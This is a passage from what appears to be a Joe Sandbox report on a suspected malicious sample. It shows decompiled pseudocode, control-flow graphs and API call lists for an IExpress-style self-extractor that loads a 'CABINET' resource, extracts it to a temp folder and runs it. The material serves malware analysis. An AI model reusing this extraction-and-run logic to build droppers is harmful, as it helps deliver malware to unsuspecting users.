                                                                                                                                                                                                        0x00215678
                                                                                                                                                                                                        0x0021567a
                                                                                                                                                                                                        0x0021589b
                                                                                                                                                                                                        0x0021589b
                                                                                                                                                                                                        0x00215680
                                                                                                                                                                                                        0x00215685
                                                                                                                                                                                                        0x0021568c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021568c
                                                                                                                                                                                                        0x0021567a
                                                                                                                                                                                                        0x0021560e
                                                                                                                                                                                                        0x00215613
                                                                                                                                                                                                        0x0021561a
                                                                                                                                                                                                        0x00215620
                                                                                                                                                                                                        0x00215626
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215626
                                                                                                                                                                                                        0x002155db
                                                                                                                                                                                                        0x002155e0
                                                                                                                                                                                                        0x002155e7
                                                                                                                                                                                                        0x002155f1
                                                                                                                                                                                                        0x002155f6
                                                                                                                                                                                                        0x002155f6
                                                                                                                                                                                                        0x002155f6
                                                                                                                                                                                                        0x002158b7
                                                                                                                                                                                                        0x002158c7

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146A0
                                                                                                                                                                                                          • Part of subcall function 0021468F: SizeofResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146A9
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146C3
                                                                                                                                                                                                          • Part of subcall function 0021468F: LoadResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146CC
                                                                                                                                                                                                          • Part of subcall function 0021468F: LockResource.KERNEL32(00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146D3
                                                                                                                                                                                                          • Part of subcall function 0021468F: memcpy_s.MSVCRT ref: 002146E5
                                                                                                                                                                                                          • Part of subcall function 0021468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002146EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 002155CF
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00215638
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0021564C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00215620
                                                                                                                                                                                                          • Part of subcall function 002144B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00214518
                                                                                                                                                                                                          • Part of subcall function 002144B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00214554
                                                                                                                                                                                                          • Part of subcall function 00216285: GetLastError.KERNEL32(00215BBC), ref: 00216285
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 002156B9
                                                                                                                                                                                                        • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0021571E
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00215737
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 002157CD
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 002157EF
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00215802
                                                                                                                                                                                                          • Part of subcall function 00212630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00212654
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00215830
                                                                                                                                                                                                          • Part of subcall function 00216517: FindResourceA.KERNEL32(00210000,000007D6,00000005), ref: 0021652A
                                                                                                                                                                                                          • Part of subcall function 00216517: LoadResource.KERNEL32(00210000,00000000,?,?,00212EE8,00000000,002119E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00216538
                                                                                                                                                                                                          • Part of subcall function 00216517: DialogBoxIndirectParamA.USER32(00210000,00000000,00000547,002119E0,00000000), ref: 00216557
                                                                                                                                                                                                          • Part of subcall function 00216517: FreeResource.KERNEL32(00000000,?,?,00212EE8,00000000,002119E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00216560
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00215878
                                                                                                                                                                                                          • Part of subcall function 0021597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 002159A8
                                                                                                                                                                                                          • Part of subcall function 0021597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 002159AF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                        • API String ID: 2436801531-337015389
                                                                                                                                                                                                        • Opcode ID: d6967f7396229c1cbef87cb06b52d3540cc7916dd32b8bec16a133b36c2ac81d
                                                                                                                                                                                                        • Instruction ID: 15d907fde564d263e61c931e2f0ca1500665d1f6e2f62a1c1fc8305c10d8a626
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6967f7396229c1cbef87cb06b52d3540cc7916dd32b8bec16a133b36c2ac81d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20811B70A24A25DADB20AF749C99BFA72ED9BF4300F4440E5F586D21D1DF708DE28E51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0021597D Relevance: 19.7, APIs: 13, Instructions: 212windowCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 324 21597d-2159b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 2159bb-2159d8 call 2144b9 call 216285 324->325 326 2159dd-215a1b GetDiskFreeSpaceA 324->326 341 215c05-215c14 call 216ce0 325->341 328 215ba1-215bde memset call 216285 GetLastError FormatMessageA 326->328 329 215a21-215a4a MulDiv 326->329 338 215be3-215bfc call 2144b9 SetCurrentDirectoryA 328->338 329->328 332 215a50-215a6c GetVolumeInformationA 329->332 335 215ab5-215aca SetCurrentDirectoryA 332->335 336 215a6e-215ab0 memset call 216285 GetLastError FormatMessageA 332->336 340 215acc-215ad1 335->340 336->338 353 215c02 338->353 344 215ad3-215ad8 340->344 345 215ae2-215ae4 340->345 344->345 346 215ada-215ae0 344->346 348 215ae7-215af8 345->348 349 215ae6 345->349 346->340 346->345 352 215af9-215afb 348->352 349->348 354 215b05-215b08 352->354 355 215afd-215b03 352->355 356 215c04 353->356 357 215b20-215b27 354->357 358 215b0a-215b1b call 2144b9 354->358 355->352 355->354 356->341 360 215b52-215b5b 357->360 361 215b29-215b33 357->361 358->353 364 215b62-215b6d 360->364 361->360 363 215b35-215b50 361->363 363->364 365 215b76-215b7d 364->365 366 215b6f-215b74 364->366 368 215b83 365->368 369 215b7f-215b81 365->369 367 215b85 366->367 370 215b87-215b94 call 21268b 367->370 371 215b96-215b9f 367->371 368->367 369->367 370->356 371->356
                                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                                        			E0021597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x218004; // 0x58ac7c6d
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x219124 = E00216285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E002144B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x219a34 & 0x00000008;
							if(( *0x219a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x219a38; // 0x0
								_t110 =  *((intOrPtr*)(0x2189e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x219124 = 0;
									_t66 = 1;
								} else {
									_t66 = E0021268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x219a38; // 0x0
							_t110 =  *((intOrPtr*)(0x2189e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x2189e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x219a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E002144B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x219124 = E00216285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E002144B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x219124 = E00216285();
					_t66 = 0;
					L33:
					return E00216CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}



































                                                                                                                                                                                                        0x0021597d
                                                                                                                                                                                                        0x00215988
                                                                                                                                                                                                        0x0021598f
                                                                                                                                                                                                        0x0021599a
                                                                                                                                                                                                        0x002159a6
                                                                                                                                                                                                        0x002159a8
                                                                                                                                                                                                        0x002159af
                                                                                                                                                                                                        0x002159b9
                                                                                                                                                                                                        0x002159dd
                                                                                                                                                                                                        0x002159e4
                                                                                                                                                                                                        0x002159f1
                                                                                                                                                                                                        0x002159fe
                                                                                                                                                                                                        0x00215a0b
                                                                                                                                                                                                        0x00215a13
                                                                                                                                                                                                        0x00215a19
                                                                                                                                                                                                        0x00215a1b
                                                                                                                                                                                                        0x00215ba1
                                                                                                                                                                                                        0x00215baf
                                                                                                                                                                                                        0x00215bbd
                                                                                                                                                                                                        0x00215bd8
                                                                                                                                                                                                        0x00215bde
                                                                                                                                                                                                        0x00215be3
                                                                                                                                                                                                        0x00215bec
                                                                                                                                                                                                        0x00215bf0
                                                                                                                                                                                                        0x00215bfc
                                                                                                                                                                                                        0x00215c02
                                                                                                                                                                                                        0x00215c02
                                                                                                                                                                                                        0x00215c02
                                                                                                                                                                                                        0x00215c04
                                                                                                                                                                                                        0x00215c04
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215c04
                                                                                                                                                                                                        0x00215a27
                                                                                                                                                                                                        0x00215a3a
                                                                                                                                                                                                        0x00215a46
                                                                                                                                                                                                        0x00215a48
                                                                                                                                                                                                        0x00215a4a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215a64
                                                                                                                                                                                                        0x00215a6a
                                                                                                                                                                                                        0x00215a6c
                                                                                                                                                                                                        0x00215abc
                                                                                                                                                                                                        0x00215ac2
                                                                                                                                                                                                        0x00215ac9
                                                                                                                                                                                                        0x00215aca
                                                                                                                                                                                                        0x00215aca
                                                                                                                                                                                                        0x00215acc
                                                                                                                                                                                                        0x00215acc
                                                                                                                                                                                                        0x00215acf
                                                                                                                                                                                                        0x00215ad1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215ad3
                                                                                                                                                                                                        0x00215ad6
                                                                                                                                                                                                        0x00215ad8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215ada
                                                                                                                                                                                                        0x00215adc
                                                                                                                                                                                                        0x00215add
                                                                                                                                                                                                        0x00215add
                                                                                                                                                                                                        0x00215ae0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215ae0
                                                                                                                                                                                                        0x00215ae2
                                                                                                                                                                                                        0x00215ae4
                                                                                                                                                                                                        0x00215ae6
                                                                                                                                                                                                        0x00215ae6
                                                                                                                                                                                                        0x00215ae6
                                                                                                                                                                                                        0x00215ae9
                                                                                                                                                                                                        0x00215aeb
                                                                                                                                                                                                        0x00215af0
                                                                                                                                                                                                        0x00215af6
                                                                                                                                                                                                        0x00215af8
                                                                                                                                                                                                        0x00215af9
                                                                                                                                                                                                        0x00215af9
                                                                                                                                                                                                        0x00215afb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215afd
                                                                                                                                                                                                        0x00215aff
                                                                                                                                                                                                        0x00215b00
                                                                                                                                                                                                        0x00215b03
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215b03
                                                                                                                                                                                                        0x00215b05
                                                                                                                                                                                                        0x00215b08
                                                                                                                                                                                                        0x00215b20
                                                                                                                                                                                                        0x00215b27
                                                                                                                                                                                                        0x00215b52
                                                                                                                                                                                                        0x00215b52
                                                                                                                                                                                                        0x00215b5b
                                                                                                                                                                                                        0x00215b62
                                                                                                                                                                                                        0x00215b6b
                                                                                                                                                                                                        0x00215b6d
                                                                                                                                                                                                        0x00215b76
                                                                                                                                                                                                        0x00215b7d
                                                                                                                                                                                                        0x00215b83
                                                                                                                                                                                                        0x00215b7f
                                                                                                                                                                                                        0x00215b7f
                                                                                                                                                                                                        0x00215b7f
                                                                                                                                                                                                        0x00215b6f
                                                                                                                                                                                                        0x00215b72
                                                                                                                                                                                                        0x00215b72
                                                                                                                                                                                                        0x00215b85
                                                                                                                                                                                                        0x00215b98
                                                                                                                                                                                                        0x00215b9e
                                                                                                                                                                                                        0x00215b87
                                                                                                                                                                                                        0x00215b8f
                                                                                                                                                                                                        0x00215b8f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215b85
                                                                                                                                                                                                        0x00215b29
                                                                                                                                                                                                        0x00215b33
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215b35
                                                                                                                                                                                                        0x00215b48
                                                                                                                                                                                                        0x00215b4a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215b4a
                                                                                                                                                                                                        0x00215b0f
                                                                                                                                                                                                        0x00215b16
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215b16
                                                                                                                                                                                                        0x00215a7c
                                                                                                                                                                                                        0x00215a8a
                                                                                                                                                                                                        0x00215aa5
                                                                                                                                                                                                        0x00215aab
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002159bb
                                                                                                                                                                                                        0x002159c0
                                                                                                                                                                                                        0x002159c7
                                                                                                                                                                                                        0x002159d1
                                                                                                                                                                                                        0x002159d6
                                                                                                                                                                                                        0x00215c05
                                                                                                                                                                                                        0x00215c14
                                                                                                                                                                                                        0x00215c14

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 002159A8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(?), ref: 002159AF
                                                                                                                                                                                                        • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00215A13
                                                                                                                                                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 00215A40
                                                                                                                                                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00215A64
                                                                                                                                                                                                        • memset.MSVCRT ref: 00215A7C
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00215A98
                                                                                                                                                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00215AA5
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00215BFC
                                                                                                                                                                                                          • Part of subcall function 002144B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00214518
                                                                                                                                                                                                          • Part of subcall function 002144B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00214554
                                                                                                                                                                                                          • Part of subcall function 00216285: GetLastError.KERNEL32(00215BBC), ref: 00216285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4237285672-0
                                                                                                                                                                                                        • Opcode ID: f4169074bb7180219b0cd8b376604ff085925891f9d7163b8139d0fe04409f82
                                                                                                                                                                                                        • Instruction ID: 149a8919a429764c213d0577bd8ebdc98eeddccc94d49470ef02b4e5557231f6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f4169074bb7180219b0cd8b376604ff085925891f9d7163b8139d0fe04409f82
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6871A0B1921219AFEB259F20DC89BFB77ECEBA8344F1440AAF40592140DA309FD48F60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00214FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121windowCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 374 214fe0-21501a call 21468f FindResourceA LoadResource LockResource 377 215161-215163 374->377 378 215020-215027 374->378 379 215057-21505e call 214efd 378->379 380 215029-215051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->380 383 215060-215077 call 2144b9 379->383 384 21507c-2150b4 379->384 380->379 388 215107-21510e 383->388 389 2150b6-2150da 384->389 390 2150e8-215104 call 2144b9 384->390 392 215110-215117 FreeResource 388->392 393 21511d-21511f 388->393 398 215106 389->398 399 2150dc 389->399 390->398 392->393 395 215121-215127 393->395 396 21513a-215141 393->396 395->396 400 215129-215135 call 2144b9 395->400 401 215143-21514a 396->401 402 21515f 396->402 398->388 405 2150e3-2150e6 399->405 400->396 401->402 404 21514c-215159 SendMessageA 401->404 402->377 404->402 405->390 405->398
                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E00214FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x219144 = E0021468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x219140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x218584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x218584, 0x841), 5); // executed
				}
				_t10 = E00214EFD(0, 0); // executed
				if(_t10 != 0) {
					__imp__#20(E00214CA0, E00214CC0, E00214980, E00214A50, E00214AD0, E00214B60, E00214BC0, 1, 0x219148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x219148; // 0x0
						_t24 =  *0x218584; // 0x0
						E002144B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x211140, 0, E00214CD0, 0, 0x219140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x218584; // 0x0
					E002144B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x219140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x219140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x2191d8; // 0x0
						if(_t47 == 0) {
							E002144B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x218a38 & 0x00000001) == 0 && ( *0x219a34 & 0x00000001) == 0) {
						SendMessageA( *0x218584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}
















                                                                                                                                                                                                        0x00214fe0
                                                                                                                                                                                                        0x00214fe6
                                                                                                                                                                                                        0x00214ff9
                                                                                                                                                                                                        0x0021500d
                                                                                                                                                                                                        0x00215013
                                                                                                                                                                                                        0x0021501a
                                                                                                                                                                                                        0x00215163
                                                                                                                                                                                                        0x00215163
                                                                                                                                                                                                        0x00215020
                                                                                                                                                                                                        0x00215027
                                                                                                                                                                                                        0x00215037
                                                                                                                                                                                                        0x00215051
                                                                                                                                                                                                        0x00215051
                                                                                                                                                                                                        0x00215057
                                                                                                                                                                                                        0x0021505e
                                                                                                                                                                                                        0x002150a7
                                                                                                                                                                                                        0x002150ad
                                                                                                                                                                                                        0x002150b4
                                                                                                                                                                                                        0x002150e8
                                                                                                                                                                                                        0x002150e8
                                                                                                                                                                                                        0x002150ee
                                                                                                                                                                                                        0x002150ff
                                                                                                                                                                                                        0x00215104
                                                                                                                                                                                                        0x00215106
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215106
                                                                                                                                                                                                        0x002150cd
                                                                                                                                                                                                        0x002150d3
                                                                                                                                                                                                        0x002150da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002150dd
                                                                                                                                                                                                        0x002150e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215060
                                                                                                                                                                                                        0x00215060
                                                                                                                                                                                                        0x00215070
                                                                                                                                                                                                        0x00215075
                                                                                                                                                                                                        0x00215107
                                                                                                                                                                                                        0x00215107
                                                                                                                                                                                                        0x0021510e
                                                                                                                                                                                                        0x00215111
                                                                                                                                                                                                        0x00215117
                                                                                                                                                                                                        0x00215117
                                                                                                                                                                                                        0x0021511f
                                                                                                                                                                                                        0x00215121
                                                                                                                                                                                                        0x00215127
                                                                                                                                                                                                        0x00215135
                                                                                                                                                                                                        0x00215135
                                                                                                                                                                                                        0x00215127
                                                                                                                                                                                                        0x00215141
                                                                                                                                                                                                        0x00215159
                                                                                                                                                                                                        0x00215159
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021515f

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146A0
                                                                                                                                                                                                          • Part of subcall function 0021468F: SizeofResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146A9
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146C3
                                                                                                                                                                                                          • Part of subcall function 0021468F: LoadResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146CC
                                                                                                                                                                                                          • Part of subcall function 0021468F: LockResource.KERNEL32(00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146D3
                                                                                                                                                                                                          • Part of subcall function 0021468F: memcpy_s.MSVCRT ref: 002146E5
                                                                                                                                                                                                          • Part of subcall function 0021468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002146EF
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00214FFE
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00215006
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 0021500D
                                                                                                                                                                                                        • GetDlgItem.USER32(00000000,00000842), ref: 00215030
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00215037
                                                                                                                                                                                                        • GetDlgItem.USER32(00000841,00000005), ref: 0021504A
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00215051
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00215111
                                                                                                                                                                                                        • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00215159
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
